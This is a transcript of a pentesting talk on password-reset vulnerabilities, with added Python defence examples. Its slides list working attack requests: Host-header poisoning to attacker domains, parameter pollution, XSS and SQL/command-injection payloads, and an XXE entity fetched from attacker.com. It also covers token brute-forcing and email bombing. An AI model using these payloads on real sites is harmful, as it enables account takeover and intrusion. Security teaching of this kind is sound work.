
Pentesting Password Reset Functionality

Anugrah SR
January 23, 2023

Pentesting Password Reset Functionality

This talk was part of RESET Hacker's Kerala's first session. Here we discuss:
Functionality hacking methodology: https://github.com/Anugrahsr/Functionality-Hacker
What the password reset functionality is
The flow of the password reset functionality
What can go wrong
Mindmap, checklist etc.

Recording can be found here: https://anugrahsr.in/


Transcript

  1. PENTESTING PASSWORD RESET FUNCTIONALITY - Anugrah SR

  2. ANUGRAH S R: Cyber Security consultant at The SecOps Group; Passive Bugbounty Hunter; Synack Red Team Member.
     Twitter: @cyph3r_asr | LinkedIn: anugrah-sr | Web: anugrahsr.in | Blog: anugrahsr.in, p1boom.com. Connect with me!

  3. AGENDA: Functionality hacking methodology; What is the password reset functionality; Flow of the password reset functionality; What can go wrong; Mindmap, Checklist.

  4. LOOKING FOR BUGS? Bug-type wise or functionality wise? XSS, SQL Injection, SSRF... versus a hacking methodology.

  5. LOOKING FOR BUGS? https://github.com/Anugrahsr/Functionality-Hacker

  6. Spot the Common One!

  7. Forgot Password?

  8. WHAT IS PASSWORD RESET? If a web app has a login, there will be a password reset function! In order to implement a proper user management system, systems integrate a Forgot Password service that allows the user to request a password reset.

  9. FLOW

  10. WHAT COULD POSSIBLY GO WRONG HERE, RIGHT? Let's see!

  11. Me and MAALP found this interesting password reset page: OTP.

  12. WHAT IF? Let's look at the impact: FULL ACCOUNT TAKEOVER, TOKEN LEAKAGE, PARAMETER POLLUTION, SQL INJECTION, GUESSABLE TOKEN, MORE..

  13. PASSWORD RESET POISONING: If you have a Host header attack, request a password reset with an evil host! This affects websites that handle the value of the Host header in an unsafe way.
     Normal request:
       POST https://example.com/reset.php HTTP/1.1
       Accept: */*
       Content-Type: application/json
       Host: example.com
     Poisoned request:
       POST https://example.com/reset.php HTTP/1.1
       Accept: */*
       Content-Type: application/json
       Host: evilhost.com

  14. $resetPasswordURL = "https://{$_SERVER['HTTP_HOST']}/resetpassword.php?token=12345678-1234-1234..";

  15. $resetPasswordURL = "https://{$_SERVER['HTTP_HOST']}/resetpassword.php?token=12345678-1234-1234..";

  16. More Host header variants:
       POST https://example.com/reset.php HTTP/1.1
       Accept: */*
       Content-Type: application/json
       Host: example.com:@evilhost.com

       POST https://example.com/reset.php HTTP/1.1
       Accept: */*
       Content-Type: application/json
       Host: example.com
       X-Forwarded-Host: attacker.com

       POST https://example.com/reset.php HTTP/1.1
       Accept: */*
       Content-Type: application/json
       Host: example.com
       Host: attacker.com

       POST https://example.com/reset.php HTTP/1.1
       Accept: */*
       Content-Type: application/json
       Host: [email protected]
     Lab: https://portswigger.net/web-security/host-header/exploiting/password-reset-poisoning
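What the fix for slides 13 to 16 looks like, as an added Python example that is not code from the talk: the slide's `$_SERVER['HTTP_HOST']` pattern reproduced beside a version that builds the link from a configured canonical host and uses the Host header only to reject requests. The host names and the `headers` dict are constructed assumptions.

```python
from urllib.parse import urlencode

# Assumed deployment configuration: the site's own names live here, never in the request.
CANONICAL_HOST = "example.com"
ALLOWED_HOSTS = {"example.com", "www.example.com"}


def vulnerable_reset_url(headers, token):
    """The $_SERVER['HTTP_HOST'] pattern from the slide, in Python: the link is
    built from whatever Host (or X-Forwarded-Host) the client sent, so a poisoned
    header ends up in the email the victim receives."""
    host = headers.get("X-Forwarded-Host") or headers["Host"]
    return f"https://{host}/resetpassword.php?{urlencode({'token': token})}"


def host_is_trusted(headers):
    """Exact-match the Host header against the configured names. Credential-style
    values ('example.com:@evilhost.com', 'example.com@evilhost.com'), added ports
    and unknown hosts all fail, because nothing is parsed or normalised first."""
    return headers.get("Host", "") in ALLOWED_HOSTS


def safe_reset_url(headers, token):
    """Build the link from configuration only; headers gate the request but never
    contribute to the URL. X-Forwarded-Host is ignored on purpose."""
    if not host_is_trusted(headers):
        raise ValueError("untrusted Host header")
    return f"https://{CANONICAL_HOST}/resetpassword.php?{urlencode({'token': token})}"
```

A request carrying two Host headers (the third variant on slide 16) cannot even be represented by the dict; the web server or reverse proxy should reject it with 400 before application code runs.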
  17. ATO: PARAMETER MANIPULATION. We can pollute the parameter to get the reset token sent to the attacker's email.
       POST https://example.com/reset.php HTTP/1.1
       Accept: */*
       Content-Type: application/json
       Host: example.com

       [email protected]&[email protected]

       POST https://example.com/reset.php HTTP/1.1
       Accept: */*
       Content-Type: application/json
       Host: example.com

       [email protected]

  18. POST https://example.com/reset.php HTTP/1.1
       Accept: */*
       Content-Type: application/json
       Host: example.com

       [email protected]&[email protected]

       POST https://example.com/reset.php HTTP/1.1
       Accept: */*
       Content-Type: application/json
       Host: example.com

       [email protected] [email protected] [email protected]

  19. MORE MANIPULATION:
       [email protected]%[email protected]
       [email protected]|[email protected]
       email="[email protected]%0a%0dcc:[email protected]"
       email="[email protected]%0a%0dbcc:[email protected]"
       email="[email protected]",email="[email protected]"
       {"email":["[email protected]","[email protected]"]}

  20. RESPONSE MANIPULATION: Replace the bad response with a good one.
       HTTP/1.1 401 Unauthorized
       {"message":"unsuccessful","statusCode":403,"errorDescription":"Unsuccessful"}
     becomes
       HTTP/1.1 200 OK
       {"message":"success","statusCode":200,"errorDescription":"Success"}

  21. TOKEN LEAKAGE IN RESPONSE: Check whether the token is leaked in the response. Add a .json extension to the endpoint, e.g. resetpassword.json.
       GET /passwordReset.json HTTP/1.1

       HTTP/1.1 200 OK
       Content-Type: application/json; charset=utf-8
       { "email" : "[email protected]", "token" : ******, "success" : "true" }

       GET /passwordReset HTTP/1.1
       email [email protected]

       HTTP/1.1 200 OK
       Content-Type: application/json; charset=utf-8

  22. TOKEN LEAKAGE: Check whether the token is leaked in the response, JS files etc.
     1 - Set up Burp in browser one
     2 - Reset the password in browser one
     3 - Open the password reset email in browser two
     4 - Copy the token
     5 - Search your Burp history for the token

  23. RESET TOKEN LEAK VIA REFERER: Once you visit the reset token link, click on any third-party website, e.g. Facebook. Intercept the request and check the Referer header.

  24. RESET TOKEN LEAK VIA REFERER: Once you visit the reset token link, click on any third-party website, e.g. Facebook. Intercept the request and check the Referer header.
       GET /home HTTP/1.1
       Host: www.third_party.com
       User-Agent: Mozilla/5.0
       Content-Type: application/x-www-form-urlencoded
       Referer: https://company.com/resetpass?token=123-456-123-456
       Origin: https://www.company.com

  25. GUESSABLE TOKEN: Find out how the password reset token is generated, e.g. from a Timestamp, UserID, Email or weak cryptography.
       POST /resetPassword HTTP/1.1
       Host: www.company.com
       Content-Type: application/x-www-form-urlencoded
       Origin: https://www.company.com
       Content-Length: Number

       [email protected]&token=<UserID-Timestamp>

  26. BRUTE FORCE THE TOKEN: Find out the password reset token by force! Use IP-Rotate, additional headers etc.
       POST /resetPassword/change HTTP/1.1
       Host: www.company.com
       Content-Type: application/x-www-form-urlencoded
       Origin: https://www.company.com
       Content-Length: Number

       [email protected]&token=FUZZ&newpass=DontHackme!

  27. EXPERIMENT WITH THE TOKEN: Experiment with the password reset token!
     Remove the token completely
     Change the token to the value 0, 1, -1 etc.
     Use the token value null/nil
     Use an expired token
     Try an array of old tokens
     Use Sequencer to check whether the token has any patterns
     Add special characters
     Change the request method / content type

  28. IDN HOMOGRAPH ATTACK: Create an account with the email [email protected]. Now generate a reset password link for the email [email protected]áil.com.burpcollaborator.net.
       POST /passwordreset HTTP/1.1
       Host: www.company.com
       User-Agent: Mozilla/5.0
       Content-Type: application/x-www-form-urlencoded
       Content-Length: Number

       [email protected]áil.com.id.burpcollaborator.net

  29. LIST OF PAYLOADS AS EMAIL ADDRESSES:
       test+(<script>alert(0)</script>)@gmail.com
       test(<script>alert(0)</script>)@gmail.com
       [email protected](<script>alert(0)</script>).com
       "<script>alert(0)</script>"@gmail.com
       "<%= 7 * 7 %>"@gmail.com
       test+(${{7*7}})@gmail.com
       "' OR 1=1 -- '"@gmail.com
       "test); DROP TABLE users;--"@gmail.com
       [email protected][id.collaborator.net]
       %@gmail.com
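How an application can refuse the polluted and payload-bearing addresses from slides 17 to 19 and 29 (and the homograph address from slide 28), as an added Python example that is not code from the talk: exactly one `email` field per request, a conservative allowlist pattern, and no control or non-ASCII characters. The address strings in the comments are constructed, and the allowlist is narrower than RFC 5322 by design.

```python
import re
from urllib.parse import parse_qs

# Deliberately narrower than RFC 5322: a plain dot-atom local part and a dotted
# ASCII hostname. No quoted local parts, comments, brackets, spaces or commas,
# which every payload in the slides above relies on.
EMAIL_RE = re.compile(
    r"^[A-Za-z0-9._+-]{1,64}@(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)+[A-Za-z]{2,63}$"
)


def validate_email(value):
    """Return the normalised address or raise ValueError."""
    # Raw CR/LF (the %0a%0d cc:/bcc: trick) and non-ASCII (the homograph
    # variant, e.g. a constructed 'victim@gmáil.com') are rejected before the
    # pattern is even consulted.
    if any(not 0x20 <= ord(ch) <= 0x7E for ch in value):
        raise ValueError("control or non-ASCII character in email")
    if not EMAIL_RE.fullmatch(value):
        raise ValueError("email does not match the allowlist")
    return value.lower()


def single_email_from_form(body):
    """Parse an application/x-www-form-urlencoded body and require exactly one
    `email` field: duplicate keys (parameter pollution) are an error, not a
    'take the first' or 'take the last' choice."""
    fields = parse_qs(body, keep_blank_values=True, strict_parsing=True)
    values = fields.get("email", [])
    if len(values) != 1:
        raise ValueError("expected exactly one email parameter")
    return validate_email(values[0])


def single_email_from_json(payload):
    """The JSON variant sends {"email": [victim, attacker]}; accept a string only."""
    email = payload.get("email") if isinstance(payload, dict) else None
    if not isinstance(email, str):
        raise ValueError("email must be a single string")
    return validate_email(email)
```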
  30. XSS: Test for XSS with the payload [email protected]"><script>alert(document.domain)</script>
       GET /[email protected]"><script>alert(document.domain)</script> HTTP/1.1
       Host: www.company.com
       User-Agent: Mozilla/5.0
       Content-Type: application/x-www-form-urlencoded
       Referer: https://previous.com/path
       Origin: https://www.company.com

  31. TIME BASED SQL INJECTION:
       GET /[email protected]'%2b(select*from(select(sleep(20)))a)%2b' HTTP/1.1
       Host: www.company.com
       User-Agent: Mozilla/5.0, sunil
       Content-Type: application/x-www-form-urlencoded
       Referer: https://previous.com/path
       Origin: https://www.company.com

  32. OS COMMAND INJECTION: Reset the password with the email [email protected]`whoami`.id.burpcollaborator.net
       POST /passwordreset HTTP/1.1
       Host: www.company.com
       User-Agent: Mozilla/5.0
       Content-Type: application/x-www-form-urlencoded
       Content-Length: Number

       [email protected]`whoami`.id.collaborator.net

  33. IDOR: Test with your reset token and the victim's email id / User-Id.
       POST /passwordreset HTTP/1.1
       Host: www.company.com
       User-Agent: Mozilla/5.0
       Content-Type: application/x-www-form-urlencoded
       Content-Length: Number

       [email protected]&token=<Your-Token>

       POST /passwordreset HTTP/1.1
       Host: www.company.com
       User-Agent: Mozilla/5.0
       Content-Type: application/x-www-form-urlencoded
       Content-Length: Number

       [email protected]&token=<Your-Token>

  34. XXE: If the password reset endpoint supports both JSON and XML, use the Content Type Converter extension to change from JSON to XML and add your payload.
       POST /resetPassword/change HTTP/1.1
       Host: www.company.com
       Content-Type: application/xml

       <?xml version="1.0" encoding="ISO-8859-1"?>
       <!DOCTYPE a [<!ENTITY % asd SYSTEM "http://attacker.com/XXE.dld">%asd;%c;]>
       <root>%rrr;<old>*****</old><new>*****</new></root>

  35. MFA AUTO DISABLING: Sometimes MFA is auto-disabled after a password reset is done.
     Enable 2FA
     Logout
     Password reset
     2FA is auto disabled

  36. SESSION EXPIRATION: Test for insufficient session expiration after a password change.
     Open the account in two different browsers
     In browser 1, reset the password
     See whether the session has expired in browser 2

  37. USER ENUMERATION: Enumerate usernames/email ids based on the difference in the web app's response.
     invalid email/username: user doesn't exist
     valid email/username: Password reset link has been sent to your email

  38. MISSING RATE LIMITING: Email bombing! Send the password reset request to Intruder and start the attack. Look at the chaos you created in the victim's email account.
     Tip: [email protected]
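An added Python example (not code from the talk) of the fixes for slides 37 and 38: a reset handler that returns the same body and status whether or not the address is registered, and rate-limits per source IP and per account, keying the account counter on the address with its +tag stripped so that tagged variants share one bucket. The account table, mail queue and timestamps are constructed stand-ins.

```python
import time
from collections import defaultdict, deque

# Constructed stand-ins for the user store and the outgoing mail queue.
ACCOUNTS = {"alice@example.com"}
SENT_MAIL = []

WINDOW_SECONDS = 600
MAX_PER_ACCOUNT = 3   # reset mails per address per window
MAX_PER_IP = 10       # reset requests per source address per window

# One body, one status, whether or not the address exists (slide 37).
GENERIC_RESPONSE = {"status": 200, "message": "If that address has an account, a reset link has been sent."}
RATE_LIMITED = {"status": 429, "message": "Too many requests, try again later."}

_hits = defaultdict(deque)   # counter key -> timestamps inside the window


def _limit_key(email):
    """Counter key for an address: lower-cased, with any +tag stripped, so
    victim+1@, victim+2@ ... all land in the same bucket."""
    local, _, domain = email.lower().partition("@")
    return local.split("+", 1)[0] + "@" + domain


def _over_limit(key, limit, now):
    bucket = _hits[key]
    while bucket and now - bucket[0] > WINDOW_SECONDS:
        bucket.popleft()               # sliding window: drop old hits
    if len(bucket) >= limit:
        return True
    bucket.append(now)
    return False


def request_reset(email, client_ip, now=None):
    """Handle POST /passwordreset. Limits are checked and counted before the
    account lookup, so neither the counters nor the timing depend on whether
    the address is registered."""
    now = time.time() if now is None else now
    if _over_limit(("ip", client_ip), MAX_PER_IP, now):
        return RATE_LIMITED
    if _over_limit(("acct", _limit_key(email)), MAX_PER_ACCOUNT, now):
        return RATE_LIMITED
    if email.lower() in ACCOUNTS:
        SENT_MAIL.append(email.lower())   # stand-in for enqueueing the mail
    return GENERIC_RESPONSE
```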
  39. RE-USABLE TOKEN: Check whether the token can be reused, or whether it has expired.
     Request a password reset
     Don't use the link
     Change the email address to a new email in account settings
     See if the old token can still be used
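Putting slides 25 to 27, 36 and 39 together on the defensive side, as an added Python example that is not the talk's code: reset tokens drawn from the OS CSPRNG, stored only as a hash with an expiry, consumed on first presentation, refused once the account's email has changed, and a successful reset that clears every other session. The in-memory user and token tables are constructed stand-ins.

```python
import hashlib
import secrets
import time

TOKEN_TTL = 15 * 60  # seconds a reset link stays valid

# Constructed in-memory stores standing in for the database.
_users = {"u1": {"email": "alice@example.com", "password": None, "sessions": {"sid-old"}}}
_reset_tokens = {}  # sha256(token) -> {"user", "email", "expires"}

def issue_reset_token(user_id, now=None):
    """256 bits from the OS CSPRNG: nothing derived from user id, timestamp or
    email, so there is no pattern for Sequencer to find and nothing feasible
    to brute-force. Only the hash is stored, so a leaked table is useless."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)
    _reset_tokens[hashlib.sha256(token.encode()).hexdigest()] = {
        "user": user_id, "email": _users[user_id]["email"], "expires": now + TOKEN_TTL,
    }
    return token

def consume_reset_token(token, now=None):
    """Single use: the record is removed on first presentation, valid or not.
    Missing, '0', '-1', 'null' and other short values never match a stored hash."""
    now = time.time() if now is None else now
    if not isinstance(token, str) or len(token) < 32:
        return None
    rec = _reset_tokens.pop(hashlib.sha256(token.encode()).hexdigest(), None)
    if rec is None or now > rec["expires"]:
        return None
    # Bound to the address it was mailed to: if the account's email changed
    # after the link went out, the old link must not work (slide 39).
    if rec["email"] != _users[rec["user"]]["email"]:
        return None
    return rec["user"]

def change_email(user_id, new_email):
    _users[user_id]["email"] = new_email

def reset_password(token, new_password, now=None):
    user_id = consume_reset_token(token, now)
    if user_id is None:
        return False
    salt = secrets.token_bytes(16)
    _users[user_id]["password"] = (salt, hashlib.scrypt(new_password.encode(), salt=salt, n=2**14, r=8, p=1))
    _users[user_id]["sessions"].clear()  # slide 36: every other logged-in session is expired
    return True
```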
  40. MINDMAPS
     https://twitter.com/N008x/status/1302515523557548032/photo/1 - Gaurav Popalghat
     https://xmind.app/m/nZwbdk - Harsh Bothra

  41. RESOURCES
     10 Password Reset Flaws - Anugrah SR (Blog, Slides)
     Functionality Hacker
     ATO Password Reset - Mahmoud M. Awali (Slides)
     Common Vulnerabilities In Forget Password - Harsh Bothra (MindMap)

  42. https://github.com/Anugrahsr/Functionality-Hacker

  43. YOU'RE ONLY AS STRONG AS YOUR PASSWORD!

  44. THANKS FOR LISTENING TO ME! Twitter @cyph3r_asr | LinkedIn @anugrah-sr | www.anugrahsr.in
     Slides will be available here: